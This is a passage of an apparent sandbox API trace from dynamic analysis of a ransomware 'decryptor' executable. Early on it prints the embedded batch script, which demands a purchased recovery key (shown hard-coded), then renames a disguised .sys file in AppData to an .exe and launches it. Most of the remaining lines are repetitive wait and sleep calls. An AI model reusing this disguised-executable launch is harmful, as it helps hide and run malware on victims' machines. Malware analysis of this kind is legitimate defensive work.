Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 583 [0120.792] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x248) returned 0x22020e8 [0120.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@shift /0\r\n@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x22020e8, cbMultiByte=583, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@shift /0\r\n@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n", lpUsedDefaultChar=0x0) returned 583 [0120.792] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x19feb0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19feb0*=0) returned 0x0 [0120.792] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22020e8 | out: hHeap=0x2200000) returned 1 [0120.792] WriteFile (in: hFile=0x88, lpBuffer=0x22010e0*, nNumberOfBytesToWrite=0x246, lpNumberOfBytesWritten=0x19fecc, lpOverlapped=0x0 | out: lpBuffer=0x22010e0*, lpNumberOfBytesWritten=0x19fecc*=0x246, lpOverlapped=0x0) returned 1 [0120.898] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010e0 | out: hHeap=0x2200000) returned 1 [0120.898] CloseHandle (hObject=0x88) returned 1 [0120.900] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea688 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea718 | out: hHeap=0x23e0000) returned 1 [0120.900] GetLastError () returned 0x0 [0120.900] SetLastError (dwErrCode=0x0) [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e80e8 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9780 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e98c0 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9928 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e77e0 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9858 | out: hHeap=0x23e0000) returned 1 [0120.900] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea200 | out: hHeap=0x23e0000) returned 1 [0120.901] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e97f0 | out: hHeap=0x23e0000) returned 1 [0120.901] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7810 | out: hHeap=0x23e0000) returned 1 [0120.901] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e77b0 | out: hHeap=0x23e0000) returned 1 [0120.901] GetLastError () returned 0x0 [0120.901] SetLastError (dwErrCode=0x0) [0120.901] GetLastError () returned 0x0 [0120.901] SetLastError (dwErrCode=0x0) [0120.901] GetLastError () returned 0x0 [0120.901] SetLastError (dwErrCode=0x0) [0120.901] GetLastError () returned 0x0 [0120.901] SetLastError (dwErrCode=0x0) [0120.901] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x23e0608, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0x28 [0120.901] wcscmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", _String2="\\\\?\\") returned -1 [0120.901] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e97f0 [0120.901] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" | out: lpsz="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0 [0120.901] GetLastError () returned 0x0 [0120.901] SetLastError (dwErrCode=0x0) [0120.901] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x28 [0120.902] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9858 [0120.902] GetLastError () returned 0x0 [0120.902] SetLastError (dwErrCode=0x0) [0120.902] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x28 [0120.902] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e97f0 | out: hHeap=0x23e0000) returned 1 [0120.902] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9858 | out: hHeap=0x23e0000) returned 1 [0120.902] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e97f0 [0120.902] wcslen (_String="507F43385DDDE7C4FA4D672FE1359C71") returned 0x20 [0120.902] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23ea050 [0120.902] GetLastError () returned 0x0 [0120.902] SetLastError (dwErrCode=0x0) [0120.902] GetLastError () returned 0x0 [0120.902] SetLastError (dwErrCode=0x0) [0120.902] GetLastError () returned 0x0 [0120.902] SetLastError (dwErrCode=0x0) [0120.902] GetLastError () returned 0x0 [0120.902] SetLastError (dwErrCode=0x0) [0120.903] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x22010b0 [0120.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="507F43385DDDE7C4FA4D672FE1359C71", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.903] malloc (_Size=0x22) returned 0x8c26c0 [0120.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="507F43385DDDE7C4FA4D672FE1359C71", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="507F43385DDDE7C4FA4D672FE1359C71", lpUsedDefaultChar=0x0) returned 33 [0120.903] free (_Block=0x8c26c0) [0120.903] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.903] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23ea0a8 [0120.903] FindResourceW (hModule=0x400000, lpName="DA18D1030F2EF89177C7670E457676A3", lpType=0xa) returned 0x0 [0120.903] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea050 | out: hHeap=0x23e0000) returned 1 [0120.903] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea0a8 | out: hHeap=0x23e0000) returned 1 [0120.903] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x28 [0120.903] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9858 [0120.903] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0120.903] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x34) returned 0x23e8e38 [0120.903] wcslen (_String="cmd") returned 0x3 [0120.903] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x10) returned 0x23e7750 [0120.904] wcslen (_String="/c") returned 0x2 [0120.904] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xe) returned 0x23e7708 [0120.904] GetLastError () returned 0x0 [0120.904] SetLastError (dwErrCode=0x0) [0120.904] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 0x3d [0120.904] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23e98c0 [0120.904] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" | out: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 0 [0120.904] GetLastError () returned 0x0 [0120.904] SetLastError (dwErrCode=0x0) [0120.904] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 0x3d [0120.904] wcslen (_String=" ") returned 0x1 [0120.904] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x28 [0120.904] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e9858, Size=0xd6) returned 0x23ea200 [0120.904] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" | out: lpsz="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"") returned 1 [0120.904] GetLastError () returned 0x0 [0120.904] SetLastError (dwErrCode=0x0) [0120.904] GetLastError () returned 0x0 [0120.905] SetLastError (dwErrCode=0x0) [0120.905] GetLastError () returned 0x0 [0120.905] SetLastError (dwErrCode=0x0) [0120.905] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x23e0608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.905] GetLastError () returned 0x0 [0120.905] SetLastError (dwErrCode=0x0) [0120.905] wcslen (_String="/c") returned 0x2 [0120.905] wcslen (_String=" ") returned 0x1 [0120.905] wcslen (_String="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"") returned 0x68 [0120.905] GetLastError () returned 0x0 [0120.905] SetLastError (dwErrCode=0x0) [0120.906] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0120.906] wcslen (_String="cmd") returned 0x3 [0120.906] wcslen (_String="C:\\WINDOWS\\sysnative\\cmd") returned 0x18 [0120.906] wcslen (_String="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"") returned 0x6b [0120.906] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x10e) returned 0x22010b0 [0120.906] wcscpy (in: _Dest=0x22010b0, _Source="\"" | out: _Dest="\"") returned="\"" [0120.906] wcscat (in: _Dest=0x22010b0, _Source="C:\\WINDOWS\\sysnative\\cmd" | out: _Dest="\"C:\\WINDOWS\\sysnative\\cmd") returned="\"C:\\WINDOWS\\sysnative\\cmd" [0120.906] wcscat (in: _Dest=0x22010b0, _Source="\"" | out: _Dest="\"C:\\WINDOWS\\sysnative\\cmd\"") returned="\"C:\\WINDOWS\\sysnative\\cmd\"" [0120.906] wcscat (in: _Dest=0x22010b0, _Source=" " | out: _Dest="\"C:\\WINDOWS\\sysnative\\cmd\" ") returned="\"C:\\WINDOWS\\sysnative\\cmd\" " [0120.906] wcscat (in: _Dest=0x22010b0, _Source="/c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"" | out: _Dest="\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"") returned="\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"" [0120.906] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop\\", lpStartupInfo=0x19fe64*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fe54 | out: lpCommandLine="\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"", lpProcessInformation=0x19fe54*(hProcess=0x234, hThread=0x88, dwProcessId=0x84, dwThreadId=0xbdc)) returned 1 [0120.975] CloseHandle (hObject=0x88) returned 1 [0120.975] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x20) returned 0x22011c8 [0120.975] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.975] GetLastError () returned 0x0 [0120.975] SetLastError (dwErrCode=0x0) [0120.975] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0120.975] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0120.976] Sleep (dwMilliseconds=0xa) [0120.987] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0120.987] Sleep (dwMilliseconds=0xa) [0120.998] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0120.998] Sleep (dwMilliseconds=0xa) [0121.009] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.009] Sleep (dwMilliseconds=0xa) [0121.020] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.020] Sleep (dwMilliseconds=0xa) [0121.031] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.031] Sleep (dwMilliseconds=0xa) [0121.042] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.042] Sleep (dwMilliseconds=0xa) [0121.053] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.053] Sleep (dwMilliseconds=0xa) [0121.064] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.064] Sleep (dwMilliseconds=0xa) [0121.077] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.081] Sleep (dwMilliseconds=0xa) [0121.092] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.092] Sleep (dwMilliseconds=0xa) [0121.103] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.103] Sleep (dwMilliseconds=0xa) [0121.114] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.114] Sleep (dwMilliseconds=0xa) [0121.127] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.127] Sleep (dwMilliseconds=0xa) [0121.138] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.138] Sleep (dwMilliseconds=0xa) [0121.149] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.149] Sleep (dwMilliseconds=0xa) [0121.160] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.160] Sleep (dwMilliseconds=0xa) [0121.172] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.172] Sleep (dwMilliseconds=0xa) [0121.183] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.183] Sleep (dwMilliseconds=0xa) [0121.194] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.194] Sleep (dwMilliseconds=0xa) [0121.205] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.205] Sleep (dwMilliseconds=0xa) [0121.217] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.217] Sleep (dwMilliseconds=0xa) [0121.228] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.228] Sleep (dwMilliseconds=0xa) [0121.239] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.239] Sleep (dwMilliseconds=0xa) [0121.250] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.250] Sleep (dwMilliseconds=0xa) [0121.261] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.261] Sleep (dwMilliseconds=0xa) [0121.272] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.272] Sleep (dwMilliseconds=0xa) [0121.283] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.283] Sleep (dwMilliseconds=0xa) [0121.295] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.295] Sleep (dwMilliseconds=0xa) [0121.306] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.306] Sleep (dwMilliseconds=0xa) [0121.320] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.320] Sleep (dwMilliseconds=0xa) [0121.332] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.332] Sleep (dwMilliseconds=0xa) [0121.343] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.343] Sleep (dwMilliseconds=0xa) [0121.404] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.404] Sleep (dwMilliseconds=0xa) [0121.416] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.416] Sleep (dwMilliseconds=0xa) [0121.427] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.427] Sleep (dwMilliseconds=0xa) [0121.438] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.438] Sleep (dwMilliseconds=0xa) [0121.449] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.449] Sleep (dwMilliseconds=0xa) [0121.460] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.460] Sleep (dwMilliseconds=0xa) [0121.471] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.471] Sleep (dwMilliseconds=0xa) [0121.482] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.482] Sleep (dwMilliseconds=0xa) [0121.494] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.494] Sleep (dwMilliseconds=0xa) [0121.505] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.505] Sleep (dwMilliseconds=0xa) [0121.519] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.519] Sleep (dwMilliseconds=0xa) [0121.532] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.532] Sleep (dwMilliseconds=0xa) [0121.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.543] Sleep (dwMilliseconds=0xa) [0121.605] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.605] Sleep (dwMilliseconds=0xa) [0121.617] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.617] Sleep (dwMilliseconds=0xa) [0121.653] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.653] Sleep (dwMilliseconds=0xa) [0121.665] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.665] Sleep (dwMilliseconds=0xa) [0121.676] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.676] Sleep (dwMilliseconds=0xa) [0121.795] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.795] Sleep (dwMilliseconds=0xa) [0121.875] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0121.875] Sleep (dwMilliseconds=0xa) [0122.082] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0122.082] Sleep (dwMilliseconds=0xa) [0123.424] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0123.424] Sleep (dwMilliseconds=0xa) [0124.051] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.051] Sleep (dwMilliseconds=0xa) [0124.174] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.174] Sleep (dwMilliseconds=0xa) [0124.243] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.243] Sleep (dwMilliseconds=0xa) [0124.394] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.394] Sleep (dwMilliseconds=0xa) [0124.532] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.532] Sleep (dwMilliseconds=0xa) [0124.732] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.732] Sleep (dwMilliseconds=0xa) [0124.812] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.812] Sleep (dwMilliseconds=0xa) [0124.930] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0124.930] Sleep (dwMilliseconds=0xa) [0125.013] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0125.013] Sleep (dwMilliseconds=0xa) [0125.123] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0125.123] Sleep (dwMilliseconds=0xa) [0125.221] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0125.221] Sleep (dwMilliseconds=0xa) [0125.426] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0125.426] Sleep (dwMilliseconds=0xa) [0125.508] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0125.508] Sleep (dwMilliseconds=0xa) [0125.654] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0125.654] Sleep (dwMilliseconds=0xa) [0126.013] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0126.013] Sleep (dwMilliseconds=0xa) [0126.117] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0126.117] Sleep (dwMilliseconds=0xa) [0126.181] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0126.181] Sleep (dwMilliseconds=0xa) [0126.218] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0126.218] Sleep (dwMilliseconds=0xa) [0126.918] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0126.918] Sleep (dwMilliseconds=0xa) [0128.420] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.420] Sleep (dwMilliseconds=0xa) [0128.493] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.493] Sleep (dwMilliseconds=0xa) [0128.549] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.549] Sleep (dwMilliseconds=0xa) [0128.585] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.585] Sleep (dwMilliseconds=0xa) [0128.639] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.639] Sleep (dwMilliseconds=0xa) [0128.655] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.655] Sleep (dwMilliseconds=0xa) [0128.669] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.669] Sleep (dwMilliseconds=0xa) [0128.686] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.686] Sleep (dwMilliseconds=0xa) [0128.810] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.810] Sleep (dwMilliseconds=0xa) [0128.865] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.865] Sleep (dwMilliseconds=0xa) [0128.897] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.897] Sleep (dwMilliseconds=0xa) [0128.924] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.924] Sleep (dwMilliseconds=0xa) [0128.982] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0128.982] Sleep (dwMilliseconds=0xa) [0129.063] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0129.063] Sleep (dwMilliseconds=0xa) [0129.108] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0129.108] Sleep (dwMilliseconds=0xa) [0129.492] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0129.492] Sleep (dwMilliseconds=0xa) [0129.611] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0129.611] Sleep (dwMilliseconds=0xa) [0129.781] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0129.781] Sleep (dwMilliseconds=0xa) [0129.979] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0129.979] Sleep (dwMilliseconds=0xa) [0130.114] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0130.114] Sleep (dwMilliseconds=0xa) [0130.337] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0130.337] Sleep (dwMilliseconds=0xa) [0130.463] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0130.463] Sleep (dwMilliseconds=0xa) [0130.612] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0130.612] Sleep (dwMilliseconds=0xa) [0130.736] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0130.736] Sleep (dwMilliseconds=0xa) [0130.856] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0130.856] Sleep (dwMilliseconds=0xa) [0131.171] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0131.171] Sleep (dwMilliseconds=0xa) [0131.392] WaitForSingleObject 